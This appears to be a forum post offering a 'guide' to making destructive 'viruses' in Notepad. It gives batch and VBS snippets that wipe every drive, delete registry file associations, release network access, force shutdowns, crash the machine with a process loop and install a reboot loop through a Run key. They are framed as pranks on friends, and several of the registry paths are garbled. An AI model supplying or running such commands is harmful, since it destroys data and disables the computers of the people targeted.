Welcome to Mobilarian Forum - Official Symbianize.

Join us now to get access to all our features. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, and so, so much more. It's also quick and totally free, so what are you waiting for?

Make Some Useful & Dangerous Viruses In Notepad! [Guide]

T 11

tokong

Corporal
Member
Access
Joined
Mar 7, 2015
Messages
445
Reaction score
2,174
Points
93
grants
₲10,870
11 years of service
How to make a virus ?

Open Notepad
Put The Codes Provided
Save it in the correct extension
Done

*Deletes everything in the computer
 
OP
T 11

tokong

Corporal
Member
Access
Joined
Mar 7, 2015
Messages
445
Reaction score
2,174
Points
93
grants
₲10,870
11 years of service
How to make a virus ?

Open Notepad
Put The Codes Provided
Save it in the correct extension
Done

*Deletes everything in the computer’s drive
@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q

Save As “Your File Name.bat [Batch File]

*Deletes everything stored in registry
@echo OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*

*A good Halloween prank for your friends this stops internet access of the user. To gain Access type IPconfig /renew in CMD
@echo off
Ipconfig /release

*Send your friend a little message and shut down his computer
@echo off
msg * Lets Roll Baby
shutdown -c “Error! Your ass got glued!” -s

*This is simple virus that crashes the computer – [Save As Anything.VBS]

Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)

Dim x
For x = 1 to 100000000
WSHShell.Run “Tourstart.exe”
Next

*This Simple Virus formats windows drives in less than 5 seconds. Only D,E And C drives.
rd/s/q D:\
rd/s/q C:\
rd/s/q E:\

*This virus can be very annoying it shutdowns computer every time the computer is turned on.
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You Are Nailed, Buy A New Computer This Is Piece Of Shit.
PAUSE
 
Top Bottom